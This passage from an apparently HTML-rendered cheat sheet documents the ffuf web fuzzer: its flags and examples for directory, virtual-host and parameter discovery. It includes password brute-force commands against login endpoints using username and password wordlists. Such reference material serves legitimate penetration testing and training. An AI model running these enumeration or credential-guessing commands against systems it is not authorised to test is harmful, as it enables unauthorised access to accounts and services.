style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install ffuf\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ego install github.com/ffuf/ffuf/v2@latest\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"core-concept\"\u003eCore Concept\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003eFUZZ\u003c/code\u003e is the keyword replaced by each wordlist entry. It can go anywhere in the request — URL path, headers, parameters, body.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eMultiple keywords are supported by naming them with \u003ccode\u003e-w wordlist:KEYWORD\u003c/code\u003e:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist1.txt -w params.txt:PARAM\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-u \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget URL (include FUZZ)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-w \u0026lt;wordlist\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWordlist (use \u003ccode\u003ewordlist:KEYWORD\u003c/code\u003e for named)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-H \u0026lt;header\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAdd/fuzz header (repeatable)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-X \u0026lt;method\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP method (default: GET)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-d \u0026lt;data\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePOST data body\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-b \u0026lt;cookie\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCookie string\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFollow redirects\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-k\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSkip TLS verification\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eThreads (default: 40)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-p \u0026lt;delay\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDelay between requests (e.g. \u003ccode\u003e0.1\u003c/code\u003e, \u003ccode\u003e0.5-1.5\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-rate \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMax requests per second\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-timeout \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRequest timeout in seconds\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-mc \u0026lt;codes\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMatch status codes (default: 200-299,301,302,307,401,403,405,500)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-ms \u0026lt;size\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMatch response size\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-mw \u0026lt;words\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMatch word count\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-ml \u0026lt;lines\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMatch line count\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-mr \u0026lt;regex\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMatch regex in response body\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-fc \u0026lt;codes\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter status codes\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-fs \u0026lt;size\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter response size\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-fw \u0026lt;words\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter word count\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-fl \u0026lt;lines\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter line count\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-fr \u0026lt;regex\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter regex in response body\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-ac\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAuto-calibrate filters (detects and removes false positives)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-of \u0026lt;fmt\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput format: \u003ccode\u003ejson\u003c/code\u003e, \u003ccode\u003eejson\u003c/code\u003e, \u003ccode\u003ehtml\u003c/code\u003e, \u003ccode\u003emd\u003c/code\u003e, \u003ccode\u003ecsv\u003c/code\u003e, \u003ccode\u003eall\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose (show redirects, full URL)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-s\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSilent — only results\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-c\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eColorize output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-recursion\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eEnable recursive fuzzing\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-recursion-depth \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRecursion depth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-e \u0026lt;exts\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFile extensions (e.g. \u003ccode\u003ephp,html,txt\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-ic\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eIgnore wordlist comments\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-input-cmd \u0026lt;cmd\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse command output as input instead of wordlist\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"directory--file-fuzzing\"\u003eDirectory \u0026amp; File Fuzzing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic directory scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# With file extensions\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -e .php,.html,.txt,.bak\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter 404s\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -fc \u003cspan style=\"color:#ae81ff\"\u003e404\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Match only 200\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -mc \u003cspan style=\"color:#ae81ff\"\u003e200\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Auto-calibrate (removes false positives automatically)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -ac\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Recursive scanning\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -recursion -recursion-depth \u003cspan style=\"color:#ae81ff\"\u003e3\u003c/span\u003e -e .php\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter by response size (remove noise)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -fs \u003cspan style=\"color:#ae81ff\"\u003e4242\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"virtual-host-discovery-host-header-fuzzing\"\u003eVirtual Host Discovery (Host Header Fuzzing)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic vhost fuzzing\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt; -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: FUZZ.example.com\u0026#34;\u003c/span\u003e -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter default response size\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt; -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: FUZZ.example.com\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -fs \u0026lt;default_size\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Auto-calibrate to remove default response\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt; -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: FUZZ.example.com\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -ac\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# HTTPS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u https://\u0026lt;ip\u0026gt; -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: FUZZ.example.com\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -k -fs \u0026lt;default_size\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"parameter-fuzzing\"\u003eParameter Fuzzing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# GET parameter discovery\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;http://\u0026lt;ip\u0026gt;/page?FUZZ=value\u0026#34;\u003c/span\u003e -w wordlist.txt -fc \u003cspan style=\"color:#ae81ff\"\u003e404\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# GET parameter value fuzzing\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;http://\u0026lt;ip\u0026gt;/page?id=FUZZ\u0026#34;\u003c/span\u003e -w numbers.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# POST parameter fuzzing\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/login \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -X POST \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -d \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;username=admin\u0026amp;password=FUZZ\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -fc \u003cspan style=\"color:#ae81ff\"\u003e401\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# POST body with JSON\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/api/login \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -X POST \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Content-Type: application/json\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -d \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;{\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;FUZZ\u0026#34;}\u0026#39;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"multiple-wordlists-clusterbomb--pitchfork\"\u003eMultiple Wordlists (Clusterbomb / Pitchfork)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Two keywords — try all combinations (clusterbomb)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ/W2 \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w wordlist.txt:FUZZ \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w extensions.txt:W2\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Username + password combinations\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/login \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -X POST \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -d \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;user=USER\u0026amp;pass=PASS\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w users.txt:USER \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w passwords.txt:PASS \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -fc \u003cspan style=\"color:#ae81ff\"\u003e401\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"fuzzing-with-proxy-burp-suite\"\u003eFuzzing with Proxy (Burp Suite)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -x http://127.0.0.1:8080 -k\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"output\"\u003eOutput\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Save to file (markdown)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -o results.md -of md\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Save as 